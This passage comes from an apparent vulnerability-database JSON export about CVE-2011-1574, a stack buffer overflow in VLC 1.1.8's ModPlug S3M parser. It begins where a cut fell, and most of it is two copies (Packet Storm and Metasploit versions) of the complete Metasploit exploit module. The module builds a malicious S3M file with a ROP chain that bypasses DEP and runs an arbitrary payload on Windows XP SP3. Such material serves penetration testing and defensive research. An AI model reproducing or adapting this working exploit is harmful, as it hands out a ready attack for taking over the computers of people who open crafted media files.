{"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17252/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:11", "description": "", "published": "2011-05-09T00:00:00", "type": "packetstorm", "title": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "modified": "2011-05-09T00:00:00", "id": "PACKETSTORM:101216", "href": "https://packetstormsecurity.com/files/101216/VideoLAN-VLC-ModPlug-ReadS3M-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: vlc_modplug_s3m.rb 12282 2011-04-08 15:48:53Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits an input validation error in libmod_plugin as \nincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 \nare affected. By creating a malicious S3M file, a remote attacker \ncould execute arbitrary code. \n \nAlthough other products that bundle libmodplug may be vulnerable, this \nmodule was only tested against VLC. \n \nNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to \npermanently enable NX support on machines that support it. As such, \nthis module is capable of bypassing DEP, but not ASLR. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 12282 $', \n'References' => \n[ \n[ 'CVE', '2011-1574' ], \n[ 'OSVDB', '72143' ], \n#[ 'BID', 'xxx' ], \n[ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ], \n[ 'URL', 'http://hackipedia.org/File%20formats/Music/html/s3mformat.php' ], \n[ 'URL', 'https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2011/Apr/113' ] \n], \n'Payload' => \n{ \n'Space' => 512 - 0x24, # Space reserved for prepended mutex code \n#'DisableNops' => true, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'VLC 1.1.8 on Windows XP SP3', \n{ \n# vuln is in libmod_plugin.dll, rop is custom to this module \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 07, 2011', # \"found: 2011-03-09\" \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']), \n], self.class) \nend \n \ndef exploit \n \nnum_orders = 0x14 \nnum_instru = 0x15 \nnum_patterns = 0x18 \n \nhdr = \"\\x00\" * 0x1c # song name (none) \nhdr << [ \n0x1a, # static byte \n0x10, # ST3 module \n0x00, # padding \nnum_orders, \nnum_instru, \nnum_patterns, \n0x00, # Flags \n0x1320, # Created with (which tracker) \n0x02, # File format information \n].pack('CCvvvvvvv') \nhdr << \"SCRM\" \n \nhdr << [ \n0x40, # global volume \n0x06, # initial speed \n0x8a, # initial tempo \n0xb0, # master volume \n0x10, # ultra click removal \n0xfb # NOTE, non-0xfc value skips an additional loop! \n# 0xfc == default channel pan positions present \n].pack('CCCCCC') \nhdr << \"\\x00\" * 10 # includes pad and special pointer \n \n# channel settings (for 32 channels) \nhdr << \"\\x00\\x08\\x01\\x09\\x02\\x0a\\x03\\x0b\\x04\\x0c\\x05\\x0d\\x06\\x0e\\x07\\x0f\" \nhdr << \"\\xff\" * 16 \n \n# orders \nhdr << \"\\x07\\x08\\x0c\\x09\\x0a\\x0b\\x0b\\x0d\\x0e\\x0f\\x0f\\x0f\\x10\\x11\\x12\\x13\" \nhdr << \"\\x14\\x16\\x17\\xff\" \n \n# parapointers to instruments \nhdr << [ 0x0f ].pack('v') * num_instru \n \n# parapoitners to patterns \nhdr << [ 0x78 ].pack('v') * num_patterns \n \n# channel default pan positions \nhdr << \"\\x00\" * 32 \n \n# instruments \ninstru = \"\\x01metasplo.ity\" \nrest = \"\\x00\" * ((0x50 * num_instru) - instru.length) \n \n# Build the rop stack \nrvas = rvas_libmod_plugin_xpsp3() \nrop = generate_rop(rvas) \nzero_ptr = rva2addr(rvas, 'Scratch') + 4 \nmutex_addr = rva2addr(rvas, 'Scratch') + 8 \nimp_Sleep = rva2addr(rvas, 'imp_Sleep') \n \n# A mutex to prevent double payloads \nlocking_code = <<-EOS \nmov ebx, [ #{imp_Sleep} ] \njmp test_lock \n \nsleep: \npush 0xdeadbeef \ncall ebx \n \ntest_lock: \nmov eax, [ #{mutex_addr} ] \ntest eax,eax \njnz sleep \n \nlock cmpxchg [ #{mutex_addr} ], ebp \ntest eax,eax \njnz sleep \n \nEOS \nrop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string \nrop << payload.encoded \n \n# This becomes the new EIP (after return) \nret = rva2addr(rvas, 'pop eax / ret') \nrest[1267, 4] = [ ret ].pack('V') \n \n# In order to force return, we smash the this ptr on the stack and point \n# it so that m_nChannels turns out to be 0. \nrest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V') \n \n# Add the ROP stack and final payload here \nrest[1275, rop.length] = rop \ninstru << rest \n \n# patterns \npatt = [ 0x10 ].pack('v') \npatt << \"\\x00\" * 0x10 \n \n \n# finalize the file \ns3m = \"\" \ns3m << hdr \n \ninstru_pad = (0x0f * 0x10) - hdr.length \ns3m << \"\\x80\" * instru_pad \ns3m << instru \n \n \n# patch in exploit trigger values \ns3m[0x22, 2] = [ 0x220 ].pack('v') \ns3m[0x24, 2] = [ 0x220 ].pack('v') \n \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nfile_create(s3m) \n \nend \n \ndef rvas_libmod_plugin_xpsp3() \n# libmod_plugin.dll from VLC 1.1.8 (Win32) \n# Just return this hash \n{ \n# Used as 'Ret' for target \n'ret' => 0x1022, \n'push eax / ret' => 0x1cc4d, \n'pop eax / ret' => 0x598a2, \n'mov eax, [eax+0x1c] / ret' => 0x542c9, \n'pop ebx / pop ebp / ret' => 0x25e2f, \n'add eax, 4 / pop ebp / ret' => 0x7028, \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad, \n'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64, \n} \nend \n \ndef generate_rop(rvas) \n# ROP fun! (XP SP3 English, Apr 10 2011) \nrvas.merge!({ \n# Instructions / Name => RVA \n'BaseAddress' => 0x653c0000, \n'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve \n'imp_Sleep' => 0xec2dc, \n'Scratch' => 0x5fbfc, \n'Data' => 0x60101, \n#'DataAdjusted' => 0x60000 - 0x58 + 0x8, \n'DataAdjusted' => 0x60000 - 0x58, \n}) \n \ncopy_stage = <<-EOS \nnop \npush esp \npop esi \nlea edi, [eax+0x10] \npush 0x7f \npop ecx \ninc ecx \nrep movsd \nEOS \ncopy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string \nif (copy_stage.length % 4) > 0 \nraise RuntimeError, \"The copy stage is invalid\" \nend \n \nrop_stack = [ \n# Resolve VirtualProtect \n'pop eax / ret', \n'imp_VirtualProtect', \n'mov eax, [eax+0x1c] / ret', \n \n# Call VirtuaProtect \n'push eax / ret', \n'pop eax / ret', # after VirtualProtect \n# Args to VirtualProtect \n'Data', # lpAddress (place holder, filled in @ runtime above) \n0x1000, # dwSize \n0x40, # flNewProtect \n'Scratch', # lpflOldProtect \n \n# Load the pre-adjusted Data addr \n'DataAdjusted', # matches pop eax / ret above \n \n## \n# Write our code little stager to our newly executable memory. \n## \n \n# Load the last 32-bits of code to write \n'pop ebx / pop ebp / ret', \ncopy_stage[0, 4].unpack('V').first, \n:unused, # ebp \n \n# Write & advance \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', \ncopy_stage[4, 4].unpack('V').first, \n:unused, # esi \n:unused, # edi \n:unused, # ebp \n'add eax, 4 / pop ebp / ret', \n:unused, # ebp \n \n# Write & advance \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', \ncopy_stage[8, 4].unpack('V').first, \n:unused, # esi \n:unused, # edi \n:unused, # ebp \n'add eax, 4 / pop ebp / ret', \n:unused, # ebp \n \n# Write & advance \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', \n0xffffffb0, # adjustment value \n:unused, # esi \n:unused, # edi \n:unused, # ebp \n \n# Adjust eax \n'sub eax, ebx / pop ebx / pop edi / pop ebp / ret', \n:unused, # ebx \n:unused, # edi \n:unused, # ebp \n \n# Execute the copy stage \n'push eax / ret', \n] \n \nrop_stack.map! { |e| \nif e.kind_of? String \n# Meta-replace (RVA) \nraise RuntimeError, \"Unable to locate key: \\\"#{e}\\\"\" if not rvas[e] \nrvas['BaseAddress'] + rvas[e] \n \nelsif e == :unused \n# Randomize \nrand_text(4).unpack('V').first \n \nelse \n# Literal \ne \nend \n} \n \nrop_stack.pack('V*') \nend \n \ndef rva2addr(rvas, key) \nraise RuntimeError, \"Unable to locate key: \\\"#{key}\\\"\" if not rvas[key] \nrvas['BaseAddress'] + rvas[key] \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101216/vlc_modplug_s3m.rb.txt"}], "metasploit": [{"lastseen": "2020-08-12T19:58:13", "description": "This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.\n", "published": "2011-05-06T15:29:07", "type": "metasploit", "title": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "modified": "2020-02-26T14:56:08", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_MODPLUG_S3M", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. As such,\n this module is capable of bypassing DEP, but not ASLR.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2011-1574' ],\n [ 'OSVDB', '72143' ],\n [ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2011/Apr/113' ]\n ],\n 'Payload' =>\n {\n 'Space'\t\t=> 512 - 0x24, # Space reserved for prepended mutex code\n #'DisableNops'\t=> true,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'VLC 1.1.8 on Windows XP SP3',\n {\n # vuln is in libmod_plugin.dll, rop is custom to this module\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 07 2011', # \"found: 2011-03-09\"\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']),\n ])\n end\n\n def exploit\n\n num_orders = 0x14\n num_instru = 0x15\n num_patterns = 0x18\n\n hdr = \"\\x00\" * 0x1c # song name (none)\n hdr << [\n 0x1a, # static byte\n 0x10, # ST3 module\n 0x00, # padding\n num_orders,\n num_instru,\n num_patterns,\n 0x00, # Flags\n 0x1320, # Created with (which tracker)\n 0x02, # File format information\n ].pack('CCvvvvvvv')\n hdr << \"SCRM\"\n\n hdr << [\n 0x40, # global volume\n 0x06, # initial speed\n 0x8a, # initial tempo\n 0xb0, # master volume\n 0x10, # ultra click removal\n 0xfb # NOTE, non-0xfc value skips an additional loop!\n # 0xfc == default channel pan positions present\n ].pack('CCCCCC')\n hdr << \"\\x00\" * 10 # includes pad and special pointer\n\n # channel settings (for 32 channels)\n hdr << \"\\x00\\x08\\x01\\x09\\x02\\x0a\\x03\\x0b\\x04\\x0c\\x05\\x0d\\x06\\x0e\\x07\\x0f\"\n hdr << \"\\xff\" * 16\n\n # orders\n hdr << \"\\x07\\x08\\x0c\\x09\\x0a\\x0b\\x0b\\x0d\\x0e\\x0f\\x0f\\x0f\\x10\\x11\\x12\\x13\"\n hdr << \"\\x14\\x16\\x17\\xff\"\n\n # parapointers to instruments\n hdr << [ 0x0f ].pack('v') * num_instru\n\n # parapoitners to patterns\n hdr << [ 0x78 ].pack('v') * num_patterns\n\n # channel default pan positions\n hdr << \"\\x00\" * 32\n\n # instruments\n instru = \"\\x01metasplo.ity\"\n rest = \"\\x00\" * ((0x50 * num_instru) - instru.length)\n\n # Build the rop stack\n rvas = rvas_libmod_plugin_xpsp3()\n rop = generate_rop(rvas)\n zero_ptr = rva2addr(rvas, 'Scratch') + 4\n mutex_addr = rva2addr(rvas, 'Scratch') + 8\n imp_Sleep = rva2addr(rvas, 'imp_Sleep')\n\n # A mutex to prevent double payloads\n locking_code = <<-EOS\n mov ebx, [ #{imp_Sleep} ]\n jmp test_lock\n\nsleep:\n push 0xdeadbeef\n call ebx\n\ntest_lock:\n mov eax, [ #{mutex_addr} ]\n test eax,eax\n jnz sleep\n\n lock cmpxchg [ #{mutex_addr} ], ebp\n test eax,eax\n jnz sleep\n\nEOS\n rop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string\n rop << payload.encoded\n\n # This becomes the new EIP (after return)\n ret = rva2addr(rvas, 'pop eax / ret')\n rest[1267, 4] = [ ret ].pack('V')\n\n # In order to force return, we smash the this ptr on the stack and point\n # it so that m_nChannels turns out to be 0.\n rest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V')\n\n # Add the ROP stack and final payload here\n rest[1275, rop.length] = rop\n instru << rest\n\n # patterns\n patt = [ 0x10 ].pack('v')\n patt << \"\\x00\" * 0x10\n\n\n # finalize the file\n s3m = \"\"\n s3m << hdr\n\n instru_pad = (0x0f * 0x10) - hdr.length\n s3m << \"\\x80\" * instru_pad\n s3m << instru\n\n\n # patch in exploit trigger values\n s3m[0x22, 2] = [ 0x220 ].pack('v')\n s3m[0x24, 2] = [ 0x220 ].pack('v')\n\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(s3m)\n\n end\n\n def rvas_libmod_plugin_xpsp3()\n # libmod_plugin.dll from VLC 1.1.8 (Win32)\n # Just return this hash\n {\n # Used as 'Ret' for target\n 'ret' => 0x1022,\n 'push eax / ret' => 0x1cc4d,\n 'pop eax / ret' => 0x598a2,\n 'mov eax, [eax+0x1c] / ret' => 0x542c9,\n 'pop ebx / pop ebp / ret' => 0x25e2f,\n 'add eax, 4 / pop ebp / ret' => 0x7028,\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad,\n 'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64,\n }\n end\n\n def generate_rop(rvas)\n # ROP fun! (XP SP3 English, Apr 10 2011)\n rvas.merge!({\n # Instructions / Name => RVA\n 'BaseAddress' => 0x653c0000,\n 'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve\n 'imp_Sleep' => 0xec2dc,\n 'Scratch' => 0x5fbfc,\n 'Data' => 0x60101,\n #'DataAdjusted' => 0x60000 - 0x58 + 0x8,\n 'DataAdjusted' => 0x60000 - 0x58,\n })\n\n copy_stage = <<-EOS\n nop\n push esp\n pop esi\n lea edi, [eax+0x10]\n push 0x7f\n pop ecx\n inc ecx\n rep movsd\nEOS\n copy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string\n if (copy_stage.length % 4) > 0\n fail_with(Failure::Unknown, \"The copy stage is invalid\")\n end\n\n rop_stack = [\n # Resolve VirtualProtect\n 'pop eax / ret',\n 'imp_VirtualProtect',\n 'mov eax, [eax+0x1c] / ret',\n\n # Call VirtuaProtect\n 'push eax / ret',\n 'pop eax / ret', # after VirtualProtect\n # Args to VirtualProtect\n 'Data', # lpAddress (place holder, filled in @ runtime above)\n 0x1000, # dwSize\n 0x40, # flNewProtect\n 'Scratch', # lpflOldProtect\n\n # Load the pre-adjusted Data addr\n 'DataAdjusted', # matches pop eax / ret above\n\n ##\n # Write our code little stager to our newly executable memory.\n ##\n\n # Load the last 32-bits of code to write\n 'pop ebx / pop ebp / ret',\n copy_stage[0, 4].unpack('V').first,\n :unused, # ebp\n\n # Write & advance\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\n copy_stage[4, 4].unpack('V').first,\n :unused, # esi\n :unused, # edi\n :unused, # ebp\n 'add eax, 4 / pop ebp / ret',\n :unused, # ebp\n\n # Write & advance\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\n copy_stage[8, 4].unpack('V').first,\n :unused, # esi\n :unused, # edi\n :unused, # ebp\n 'add eax, 4 / pop ebp / ret',\n :unused, # ebp\n\n # Write & advance\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\n 0xffffffb0, # adjustment value\n :unused, # esi\n :unused, # edi\n :unused, # ebp\n\n # Adjust eax\n 'sub eax, ebx / pop ebx / pop edi / pop ebp / ret',\n :unused, # ebx\n :unused, # edi\n :unused, # ebp\n\n # Execute the copy stage\n 'push eax / ret',\n ]\n\n rop_stack.map! { |e|\n if e.kind_of? String\n # Meta-replace (RVA)\n fail_with(Failure::Unknown, \"Unable to locate key: \\\"#{e}\\\"\") if not rvas[e]\n rvas['BaseAddress'] + rvas[e]\n\n elsif e == :unused\n # Randomize\n rand_text(4).unpack('V').first\n\n else\n # Literal\n e\n end\n }\n\n rop_stack.pack('V*')\n end\n\n def rva2addr(rvas, key)\n fail_with(Failure::Unknown, \"Unable to locate key: \\\"#{key}\\\"\") if not rvas[key]\n rvas['BaseAddress'] + rvas[key]\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/vlc_modplug_s3m.rb"}]}
